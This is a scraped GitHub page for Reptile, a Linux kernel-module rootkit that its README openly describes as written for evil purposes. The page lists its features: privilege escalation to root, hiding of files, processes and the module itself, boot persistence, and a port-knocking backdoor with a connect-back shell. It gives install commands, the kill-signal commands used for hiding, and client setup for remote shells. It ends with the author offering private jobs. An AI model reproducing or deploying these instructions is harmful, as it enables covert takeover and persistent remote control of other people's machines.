EBWi11 / Reptile

LKM Linux rootkit

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Reptile






Reptile is a LKM rootkit written for evil purposes that runs on Linux kernel 2.6.x/3.x/4.x.




Features

  • Give root to unprivileged users
  • Hide files and directories
  • Hide files contents
  • Hide processes
  • Hide himself
  • Hidden boot persistence
  • Strings obfuscation (Method suggested by: milabs)
  • ICMP/UDP/TCP port-knocking backdoor
  • Full TTY/PTY shell with file transfer
  • Client to handle Reptile Shell
  • Shell connect back each X times (not default)

Install

apt-get install linux-headers-$(uname -r)
git clone https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./setup.sh install

Uninstall

./setup.sh remove

Usage

Binaries will be copied to /reptile folder (or any name you chose), that will be hidden by Reptile.

Getting root privileges

Just run: /reptile/reptile_r00t

Hiding

  • Hide/unhide reptile module: kill -50 0
  • Hide/unhide process: kill -49 <PID>
  • Hide/unhide files contents: kill -51 0 and all content between the tags will be hidden

Example:

#<reptile> 
content to hide 
#</reptile>

Backdoor

Configure and compile client: ./setup.sh client
You use the client to send magic packets and get your full TTY encrypted shell!

More informations: Reptile Shell

Warning

Some functions of this module is based on another rootkits. Please see the references!

References

Disclaimer

I do private jobs, if you are interesting send me an e-mail at: f0rb1dd3n@tuta.io


About

LKM Linux rootkit


Languages

Language:C 86.4%Language:Shell 13.1%Language:Makefile 0.5%